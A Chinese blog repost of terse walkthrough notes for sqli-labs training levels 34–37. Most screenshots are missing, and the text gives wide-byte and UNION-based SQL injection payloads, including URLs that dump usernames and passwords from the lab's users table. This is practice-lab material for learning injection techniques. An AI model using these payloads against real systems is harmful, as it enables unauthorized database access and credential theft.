首页 > 其他 > 详细

less 34-37

时间:2020-02-02 20:48:41      阅读:85      评论:0      收藏:0      [点我收藏+]

less34

admin  admin

技术分享图片

 

 

ad  ad

 

技术分享图片

 

 

a%df’    a%df’   登录失败

 

技术分享图片

 

 

技术分享图片

 

 

技术分享图片

 

 

 

 

 

 技术分享图片

 

 

 技术分享图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

a%df\‘


uname=a%25df%5C%27&passwd=1111&submit=Submit

a%df%5C%27

删除25  改包后  再次执行一次

技术分享图片

 

 

 

 

技术分享图片

 

 

 

技术分享图片

然后再修改包  猜列数

 

 

 

技术分享图片

 

 

技术分享图片

 

 

 技术分享图片

 

 

 

 也可以使用第二种方法      ‘   ------>   ?‘       这里的注释符只可以使用#

技术分享图片

 

 

技术分享图片

 

 

 

 

 

 技术分享图片

 

 

 

 

 

 

LESS35

技术分享图片

 

 

技术分享图片

 

 

技术分享图片

 

 

 

这一关基本与上一关相同,就是没有了数据包裹,所以不用‘直接进行注入:

http://192.168.50.100/sqli-labs/Less-35/?id=111   union select 1,2,

      group_concat(concat_ws(0x7e,username,password)) from security.users

技术分享图片

 

 

 

 

 

less36  使用宽字节注入

 

 

 

 技术分享图片

 

技术分享图片

 

 

 

 

 

 

 

 

 

 

技术分享图片

 

 

技术分享图片

 

 

 

技术分享图片

 

 

技术分享图片

 

 

技术分享图片

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df‘  union select 1,2,3  --+

 

技术分享图片

 

 

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df‘  union select 1,2,

group_concat(concat_ws(0x7e,username,password)) from security.users  --+

 

 技术分享图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

less 37 

技术分享图片

 

 

技术分享图片

 

 

 

 

 

 

 

 

 

 

 

抓包

技术分享图片

 

技术分享图片

 

技术分享图片

 

less 34-37

原文:https://www.cnblogs.com/xingyuner/p/12253341.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!